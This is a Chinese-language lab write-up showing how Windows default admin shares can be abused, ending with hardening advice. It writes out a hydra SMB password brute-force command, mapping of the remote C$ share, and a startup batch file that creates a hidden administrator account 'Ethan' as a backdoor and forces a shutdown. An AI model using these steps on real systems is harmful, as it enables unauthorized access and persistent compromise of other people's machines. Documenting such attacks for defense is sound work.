我是安全界的小学生,之前写了一篇“windows彻底关闭默认共享”,但是一直未研究“为什么要关闭?不关闭能咋地?”,最近进行了一次验证实验,探索了默认共享会带来的危害,加深了对默认共享的理解,闲言少叙,主戳主题:
一、所需条件:
1、个人PC(后面都称作本机)
2、虚拟机上windows服务器 192.168.67.128
3、hydra工具:进行暴力破解
二、开始实验:
1、本机状态
2、windows服务器状态
3、在本机输入命令:net use k: \\192.168.67.128\c$
结果:
输入已破解用户的用户名和密码,比如:Administrator password
如果密码错误,使用hydra进行破解:(附上hydra使用方法)
命令为:hydra -l administrator -P pass.txt 192.168.67.128 smb
破解结果:发现密码是123456
然后再进行登录:登录成功
4、在查看本机,会发现多了一个k盘(为windows服务器c盘的映射)
5、在开机启动项里添加批处理文件
先写一个批处理文件:
copy con 111.bat
net user Ethan 123456 /add
net localgroup Administrators Ethan /add
shutdown -s -t 180 -c "hello man,your PC has been hacked by Ethan!!!"
复制到桌面和启动下面:
6、当对方重启服务器、或者出于好奇,打开桌面的.bat文件时:弹出关机提示,同时新建Ethan用户。
查看,已经创建新的Ethan超级管理员账户
此时,如果对方未发现Ethan用户,就算修改administrator用户,仍然有Ethan用户作为后门。
7、如果服务器开启了远程桌面,也可以使用Ethan账户进行远程桌面登录。
成功:
三、总结:
关于windows默认共享问题,要想利用,首先需要服务器开了共享,其次是知道对方的用户名和口令,所以还是要注意修改默认用户名,并加强口令复杂度。
如果不需要,彻底关闭默认共享。
我是安全界的小学生,欢迎大家批评指导。